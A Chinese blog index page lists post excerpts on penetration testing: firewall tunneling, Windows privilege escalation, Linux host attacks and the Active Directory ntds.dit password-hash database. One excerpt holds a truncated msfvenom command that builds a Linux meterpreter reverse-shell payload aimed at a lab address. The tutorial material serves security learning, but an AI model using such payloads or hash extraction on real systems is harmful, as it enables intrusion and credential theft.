摘要: 内网中有很多边界设备,比如防火墙。这种边界设备会控制内部主机的对外连接,一般会仅允许某些种类的端口开放或某种数据流量出入 这就意味着我们只能通过有限的选择,来绕过防火墙限制,与目标内网中的机器通信,这就需要隧道了,外观表现为各种端口转发连接,深层次还是隧道的思想 一般按照OSI模型也把隧道按照不同层 阅读全文
posted @ 2023-09-08 20:57 树大招疯 阅读(188) 评论(0) 推荐(0) 编辑
该文被密码保护。 阅读全文
posted @ 2023-09-08 20:57 树大招疯 阅读(4) 评论(0) 推荐(0) 编辑
摘要: ### 0x00 权限提升概述 ##### 提权概述 权限提升(privilege escalation):攻击者通过安全漏洞把获取到的受限制的低权限用户突破限制,提权至高权限 的管理员用户,从而获得对整个系统得控制权。 ##### Windows系统内置用户和组 内置用户: - Administr 阅读全文
posted @ 2023-09-08 20:55 树大招疯 阅读(205) 评论(0) 推荐(0) 编辑
摘要: ### 0x00 Linux主机渗透 ##### MSF生成LUNIX平台可执行文件 ```powershell msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.31.246 lport=8882 -f elf -o local 阅读全文
posted @ 2023-09-08 20:39 树大招疯 阅读(153) 评论(0) 推荐(0) 编辑
摘要: ### 0x00 活动目录数据库 > - 由ntds.dit文件构成 > - 默认存储在所有域控制器上的%SystemRoot%\NTSD文件夹中 > - 只能通过域控制器进程和协议访问 > ntds.dit:活动目录数据库,包括有关域用户、组和组成员身份的信息。它还包括域中所有用户的密码哈希值。 阅读全文
posted @ 2023-09-08 20:38 树大招疯 阅读(75) 评论(0) 推荐(0) 编辑